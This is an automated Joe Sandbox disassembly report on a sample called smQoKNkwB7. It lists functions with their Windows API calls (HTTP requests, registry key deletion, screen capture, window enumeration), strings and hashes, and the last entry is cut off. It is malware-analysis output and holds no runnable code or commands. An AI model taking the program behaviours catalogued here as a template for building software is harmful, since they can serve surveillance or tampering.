Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 45ff7d10951b4da9d001d073755d5c13668169a9b1776f015d3fe8adb2af00b0
Instruction ID: ff32f6ea00246b90da6f4cc3c04a0ffa3804f3ebdc822149339f0f6f0a9d535b
Opcode Fuzzy Hash: 45ff7d10951b4da9d001d073755d5c13668169a9b1776f015d3fe8adb2af00b0
Instruction Fuzzy Hash: 91712B70640216BEEB258F65ED8DF9ABF64FF00324F204206F6256A1E0C7B2A964DB50

Function 00276CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00276DEB

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00276E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00276E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00276E94
DestroyWindow.USER32(?), ref: 00276EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001E0000,00000000), ref: 00276EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00276EFD
GetDesktopWindow.USER32 ref: 00276F16
GetWindowRect.USER32(00000000), ref: 00276F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00276F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00276F4D

Part of subcall function 001F9944: GetWindowLongW.USER32(?,000000EB), ref: 001F9952

Strings

tooltips_class32, xrefs: 00276E58, 00276EDD
0, xrefs: 00276D98

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 7be90ecfdb6480fbb168933920495cb76741568a4823b7748184dffd27908085
Instruction ID: 3c3f338d0bc756101d7e33d394e2a30dfd9a6ff62ed6c2abca778ad881265ecd
Opcode Fuzzy Hash: 7be90ecfdb6480fbb168933920495cb76741568a4823b7748184dffd27908085
Instruction Fuzzy Hash: BC71A870100641AFDB25DF28EC48FBABBF9FB89300F64451DF98987261C770A969CB12

Function 0025C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0025C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0025C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0025C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0025C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0025C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0025C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0025C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0025C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0025C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0025C5F0
InternetCloseHandle.WININET(00000000), ref: 0025C5FB

Strings

, xrefs: 0025C575

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: e81d4e3d4aebcdf19482eaeb44dae860bf0a1338e8199b0c391dda01b36cf296
Instruction ID: 3603bd61703d669716648812a8930b5011639e088b65e62982de690783088a62
Opcode Fuzzy Hash: e81d4e3d4aebcdf19482eaeb44dae860bf0a1338e8199b0c391dda01b36cf296
Instruction Fuzzy Hash: F2516EB0510305BFDB218FA4DD88ABB7BBCFF08755F60441EF945A6210EB34EA589B64

Function 0027856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00278592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785BA
GlobalLock.KERNEL32(00000000), ref: 002785C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785D7
GlobalUnlock.KERNEL32(00000000), ref: 002785E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0027FC38,?), ref: 00278611
GlobalFree.KERNEL32(00000000), ref: 00278621
GetObjectW.GDI32(?,00000018,?), ref: 00278641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00278671
DeleteObject.GDI32(?), ref: 00278699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002786AF

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 971592ec18f40949a88b5af364619d6e5d2c3aa20870408d83a2548518aacb94
Instruction ID: 616b079b455399257a5020085e9e1d4aa51cd6c4859fb88948bc3863609aac86
Opcode Fuzzy Hash: 971592ec18f40949a88b5af364619d6e5d2c3aa20870408d83a2548518aacb94
Instruction Fuzzy Hash: F141F875641209BFDB119FA5DC8CEAA7BBCFF89B11F248058F909E7260DB709941CB60

Function 002514BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00251502
VariantCopy.OLEAUT32(?,?), ref: 0025150B
VariantClear.OLEAUT32(?), ref: 00251517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002515FB
VarR8FromDec.OLEAUT32(?,?), ref: 00251657
VariantInit.OLEAUT32(?), ref: 00251708
SysFreeString.OLEAUT32(?), ref: 0025178C
VariantClear.OLEAUT32(?), ref: 002517D8
VariantClear.OLEAUT32(?), ref: 002517E7
VariantInit.OLEAUT32(00000000), ref: 00251823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00251625
Default, xrefs: 002516AF

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 07d2d40f2b6983461c7cd08d146320018d76079526384f43137a95a5ac51a852
Instruction ID: 44486e7ebcf6e0bc72e4b564c008aaef66955fbe509c15392d5ec42aaa17300b
Opcode Fuzzy Hash: 07d2d40f2b6983461c7cd08d146320018d76079526384f43137a95a5ac51a852
Instruction Fuzzy Hash: 5BD15671A20105DBCB10AF65E888B7DB7B4BF44701F60805AFC06AB190EBB4DC79DB65

Function 0026B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 0026C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0026B6AE,?,?), ref: 0026C9B5
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026C9F1
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA68
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0026B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0026B80A
RegCloseKey.ADVAPI32(?), ref: 0026B87E
RegCloseKey.ADVAPI32(?), ref: 0026B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0026B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0026B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0026B922
FreeLibrary.KERNEL32(00000000), ref: 0026B983
RegCloseKey.ADVAPI32(00000000), ref: 0026B994

Strings

advapi32.dll, xrefs: 0026B8ED
RegDeleteKeyExW, xrefs: 0026B8FE

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: b9222bbde5116ca99211616be2efa55d267bb643dfb8195c6ab930238f652ff5
Instruction ID: 7bf0e749544ac5d4705613ff1b2946b99e11331975cf9fb5dd77e4dbb8bfd988
Opcode Fuzzy Hash: b9222bbde5116ca99211616be2efa55d267bb643dfb8195c6ab930238f652ff5
Instruction Fuzzy Hash: 27C19C31218642AFD715DF25C494F2ABBE5BF84308F54845CF49A8B2A2CB71EC96CB91

Function 0026255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 002625D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002625E8
CreateCompatibleDC.GDI32(?), ref: 002625F4
SelectObject.GDI32(00000000,?), ref: 00262601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0026266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002626AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002626D0
SelectObject.GDI32(?,?), ref: 002626D8
DeleteObject.GDI32(?), ref: 002626E1
DeleteDC.GDI32(?), ref: 002626E8
ReleaseDC.USER32(00000000,?), ref: 002626F3

Strings

(, xrefs: 0026268D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: f3a4209bc1364f49dd2101d1cdfccbda537eb86fa95d2871c782acad7a9b199c
Instruction ID: e4e3086dea31a41ed9c9d379af2dd12f247df8e752d5954213334679a726ce1a
Opcode Fuzzy Hash: f3a4209bc1364f49dd2101d1cdfccbda537eb86fa95d2871c782acad7a9b199c
Instruction Fuzzy Hash: 8D61F375D10219EFCF14CFA4D888EAEBBB9FF48310F208529E959A7250D770A991CF90

Function 0021DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0021DAA1

Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D659
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D66B
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D67D
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D68F
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6A1
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6B3
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6C5
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6D7
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6E9
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6FB
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D70D
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D71F
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D731

_free.LIBCMT ref: 0021DA96

Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,00000000,00000000,00000000,00000000,?,0021D7F8,00000000,00000007,00000000,?,0021DBF5,00000000), ref: 002129DE
Part of subcall function 002129C8: GetLastError.KERNEL32(00000000,?,0021D7D1,00000000,00000000,00000000,00000000,?,0021D7F8,00000000,00000007,00000000,?,0021DBF5,00000000,00000000), ref: 002129F0

_free.LIBCMT ref: 0021DAB8
_free.LIBCMT ref: 0021DACD
_free.LIBCMT ref: 0021DAD8
_free.LIBCMT ref: 0021DAFA
_free.LIBCMT ref: 0021DB0D
_free.LIBCMT ref: 0021DB1B
_free.LIBCMT ref: 0021DB26
_free.LIBCMT ref: 0021DB5E
_free.LIBCMT ref: 0021DB65
_free.LIBCMT ref: 0021DB82
_free.LIBCMT ref: 0021DB9A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: b2006d628fedb886ca22f8d57afdb7a8e7d7b170fe08cfc6f84278f32f227f55
Instruction ID: e2da868e72707bcc4a2f2740365d3fb5dbd32792a5ca4da653758a0858295697
Opcode Fuzzy Hash: b2006d628fedb886ca22f8d57afdb7a8e7d7b170fe08cfc6f84278f32f227f55
Instruction Fuzzy Hash: 7C316D3262460ADFDB21AE38E841BD677E8FF20320F204429F049DB191DE31ADF48B20

Function 0024365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0024369C
_wcslen.LIBCMT ref: 002436A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00243797
GetClassNameW.USER32(?,?,00000400), ref: 0024380C
GetDlgCtrlID.USER32(?), ref: 0024385D
GetWindowRect.USER32(?,?), ref: 00243882
GetParent.USER32(?), ref: 002438A0
ScreenToClient.USER32(00000000), ref: 002438A7
GetClassNameW.USER32(?,?,00000100), ref: 00243921
GetWindowTextW.USER32(?,?,00000400), ref: 0024395D

Strings

%s%u, xrefs: 00243734

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 053eb84edf21bee58a337f65d20706484f4bb046048046f336ffe994cdeb0397
Instruction ID: 8df29cd195519971a16bcf3fc1ddcc06de49954039aa2b7645a2ae8365b55829
Opcode Fuzzy Hash: 053eb84edf21bee58a337f65d20706484f4bb046048046f336ffe994cdeb0397
Instruction Fuzzy Hash: DA91AE71224707AFD71DDF24C885BAAF7A8FF44350F108629F99AC2190DB30EA65CB91

Function 00244954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00244994
GetWindowTextW.USER32(?,?,00000400), ref: 002449DA
_wcslen.LIBCMT ref: 002449EB
CharUpperBuffW.USER32(?,00000000), ref: 002449F7
_wcsstr.LIBVCRUNTIME ref: 00244A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00244A64
GetWindowTextW.USER32(?,?,00000400), ref: 00244A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00244AE6
GetClassNameW.USER32(?,?,00000400), ref: 00244B20
GetWindowRect.USER32(?,?), ref: 00244B8B

Strings

ThumbnailClass, xrefs: 00244A6F, 00244AF1

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: a23469a25cc01adc123fc5c8f2816547bcff7b8d2ba922286b39208bdc0feb93
Instruction ID: 0a7a9676884e44cb655b9afdb5ca3a17314eda45bc3354b11463501f3c743d1c
Opcode Fuzzy Hash: a23469a25cc01adc123fc5c8f2816547bcff7b8d2ba922286b39208bdc0feb93
Instruction Fuzzy Hash: 3B91C0714242069FDB08EF14C985FAA77E8FF84718F04846AFD859A096DB30ED65CFA1

Function 00278D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00278D5A
GetFocus.USER32 ref: 00278D6A
GetDlgCtrlID.USER32(00000000), ref: 00278D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00278E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00278ECF
GetMenuItemCount.USER32(?), ref: 00278EEC
GetMenuItemID.USER32(?,00000000), ref: 00278EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00278F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00278F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00278FA1

Strings

0, xrefs: 00278E9F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 1e551ebcad2021c275d6a9ccbb46b140bb63a78cae4320c27eefb605f048fb0c
Instruction ID: a8707dbcec61d9037951120cab329c835f4241606fe174e8900684cf7eff3dd0
Opcode Fuzzy Hash: 1e551ebcad2021c275d6a9ccbb46b140bb63a78cae4320c27eefb605f048fb0c
Instruction Fuzzy Hash: E881BF715583029FD720CF24D888AAB7BE9FF88354F14891DF98C97291DB71D960CBA2

Function 0024DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0024DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0024DC46
_wcslen.LIBCMT ref: 0024DC50
_wcsstr.LIBVCRUNTIME ref: 0024DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0024DCBC

Strings

%u.%u.%u.%u, xrefs: 0024DD9A
04090000, xrefs: 0024DCF2
DefaultLangCodepage, xrefs: 0024DD1F
StringFileInfo\, xrefs: 0024DC8F
\VarFileInfo\Translation, xrefs: 0024DCB4

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 313690ceefa6585d9925e446dadcd0db95a5c537d7b9b05b2b80a2af37a244d4
Instruction ID: ad6e795160661c6cfe6674fbb057fa4332f4cd0626a71c2ad297a29f3d26e1f4
Opcode Fuzzy Hash: 313690ceefa6585d9925e446dadcd0db95a5c537d7b9b05b2b80a2af37a244d4
Instruction Fuzzy Hash: 18411672960305BADB08AB74DC47EBF77ACEF52710F14406AF905A61C3EB7499218BA4

Function 0026CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0026CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0026CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0026CD48

Part of subcall function 0026CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0026CCAA
Part of subcall function 0026CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0026CCBD
Part of subcall function 0026CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0026CCCF
Part of subcall function 0026CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0026CD05
Part of subcall function 0026CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0026CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0026CCF3

Strings

advapi32.dll, xrefs: 0026CCB8
RegDeleteKeyExW, xrefs: 0026CCC9

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 8847177f690e5fbb838b0a5ca972336c761c3e26593a40d668a8f5563d65a96e
Instruction ID: f553a6d363fbf4a7a883c75d6a5e897b5d6669543f5a15a8b96a57513eeed331
Opcode Fuzzy Hash: 8847177f690e5fbb838b0a5ca972336c761c3e26593a40d668a8f5563d65a96e
